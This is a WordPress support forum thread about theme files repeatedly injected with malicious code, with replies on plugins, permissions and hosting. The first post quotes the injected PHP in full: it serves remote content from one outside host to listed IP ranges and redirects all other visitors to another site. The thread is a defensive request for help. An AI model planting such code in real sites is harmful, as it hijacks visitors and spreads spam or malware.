The Support Forums will be in read-only mode for a scheduled maintenance window on 01 September 2016 14:00 UTC - 20:00 UTC. More information.

Theme files keep getting injected with viral script (9 posts)

  1. lovablechelsey
    Posted 7 years ago #

    Hi there,

    I am pretty much stumped. One of my clients runs a WordPress blog and no matter what I do, I can't keep it from getting hacked. I've updated all the plugins, deleted all unnecessary looking files from the server, he changes his FTP password once a week, yet he still keeps getting his files modified.

    It only happens in the theme folder, to either the index.php, header.php or footer.php files. This is the typical code that gets inserted:

    if ( !getenv("HTTP_COOKIE") && preg_match( "/^abstract=(.+)/", getenv("QUERY_STRING"), $m) ) { $qs_kw = $m[1]; 
    preg_match("/([0-9]+).([0-9]+).([0-9]+).([0-9]+)/", getenv("REMOTE_ADDR"), $arr);
     $a = $arr[1]; $b = $arr[2];
    $lst = ',38100,189221,61135,220181,174132,66230,7455,66102,20880,20383,97116,89122,3899,66232,19347,66231,66228,66212,61247,67195,86,72240,7214,74125,66249,6468,64233,21633,216239,20985,209185,202212,202160,203141,216109,216239,21632,6475,66163,66196,66228,6694,68142,7230,69147,6555,746,208111,6428,';
     if ( preg_match( "/,$a$b,/", $lst) ) {$remfl = implode('', file ("http://u8i.org/frame_file.php?k=$qs_kw&pl=207&mt=r")); echo $remfl; exit;} 
     else { $rf = getenv("HTTP_REFERER");
    echo "<script>document.location='http://www.crusadersafc.com/modules/xml/302.php?qq='+escape('$qs_kw')+'&fn='+escape(location.href)+'&dr='+escape('$rf')</script>"; exit;
    } }

    I'm wondering if it has to do with certain settings in his php.ini that I'm not catching. Anyone have any ideas?

  2. TransPersonal
    Posted 7 years ago #

    I don't know but maybye using some security plugins would prevent the hacking. WP-Firewall (free-google it) , askapache password protect, login lockdown, etc.

  3. Shane G
    Posted 7 years ago #


    Make sure that theme and plugin which you have installed on your blog are not vulnerable and compatible to your host and blog configuration...

    Assign recursively 644 permissions to the theme directory of your blog..


    Shane G.

  4. lovablechelsey
    Posted 7 years ago #

    I tried making the permission to the themes directory 644, but the CSS and images will not load unless the permissions are 755. Could that be the problem?

  5. lovablechelsey
    Posted 7 years ago #

    How can I tell if a theme is vulnerable?

  6. lovablechelsey
    Posted 7 years ago #

    Just FYI in case anyone has the same problem:

    I downloaded the WordPress Firewall as suggested by TransPersonal from http://www.seoegghead.com/software/wordpress-firewall.seo and it works amazingly well. The site was getting "WordPress-Specific SQL Injection Attacks" and the firewall blocked them. Thanks!!!

  7. Inspired2Write
    Posted 7 years ago #

    Hi lovablechelsey,

    I'm in a similar boat with you. My site was also attacked with a script mentioned here by another member:


    Read the members last post in that thread. The member stated that the script was hiding on their hosts server, and until it was deleted from the server it resurfaced on that persons blog. Hope that might help, if the seoegghead doesn't fix your challenge.

  8. esmi
    Forum Moderator
    Posted 7 years ago #

    Who is the site hosted with? If it's on a shared server, the weak link could be another site on the same server. Have you spoken to the hosting provider?

  9. lovablechelsey
    Posted 7 years ago #

    The WordPress Firewall showed that the attacked was being made through wp-admin/theme-editor.php, so once I changed the wordpress administrator's password there have been no more attempts. Phew!

Topic Closed

This topic has been closed to new replies.

About this Topic